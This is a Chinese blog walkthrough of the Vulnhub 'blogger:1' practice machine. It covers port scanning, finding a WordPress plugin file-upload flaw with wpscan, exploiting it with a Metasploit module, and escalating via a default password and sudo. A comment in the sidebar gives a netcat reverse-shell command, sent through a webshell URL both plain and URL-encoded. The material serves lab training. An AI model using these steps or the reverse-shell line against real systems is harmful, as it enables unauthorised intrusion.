Vulnhub: blogger:1靶机

ctostm

于 2023-08-03 20:09:55 发布

阅读量758

点赞数

文章标签：安全 web安全网络安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.youkuaiyun.com/qq_43884092/article/details/132091272

版权

kali：192.168.111.111

靶机：192.168.111.176

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.176

在80端口的/assets/fonts/目录下发现blog目录，访问后发现为wordpress

利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞

wpscan --url http://blogger.thm/assets/fonts/blog/ -e u,ap --plugins-detection mixed

漏洞利用

msf进行漏洞利用

use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
set targeturi /assets/fonts/blog/
set blogpath /?p=1
set rhosts blogger.thm
run

提权

vagrant用户的密码同样为vagrant

vagrant用户sudo权限

提升为root

sudo su

flag

博客等级

码龄6年

102
原创

9
点赞

33
收藏

12
粉丝

关注

私信

热门文章

最新评论

Vulnhub:Digitalworld.local (Mercy v2)靶机
S20030803: 为什么访问robots.txt文件时访问不了呢
Vulnhub: LemonSqueezy靶机
Bobo10969: 我找到問題了是我虛擬機network connection選到了bridge改成NAT就成功了感謝大大的幫忙!
Vulnhub: LemonSqueezy靶机
Bobo10969: 還是有可能是我後門放錯地方嗎有需要再myphpadmin的wordpress新增一個table再寫入嗎
Vulnhub: LemonSqueezy靶机
ctostm: 假设本机ip为192.168.111.111，利用 nc -lvp 5555 命令监听本地5555端口(监听的端口为未被使用的端口即可)，之后利用webshell执行的命令为：nc -e /bin/bash 192.168.111.111 5555 (完整的url为：http://lemonsqueezy/wordpress/shell1.php?cmd=nc -e /bin/bash 192.168.111.111 5555)，如果执行后无法获得反弹shell，可以对执行的命令进行url编码(可以使用burp的decoder模块)后再执行 (编码后完整的url为：http://lemonsqueezy/wordpress/shell1.php?cmd=%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%31%31%2e%31%31%31%20%34%34%34%34)，生成反弹shell的网站：https://www.revshells.com/
Vulnhub: LemonSqueezy靶机
Bobo10969: 不好意思那請問端口是用沒被使用的端口就可以了嗎發現好像還是監聽不到

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。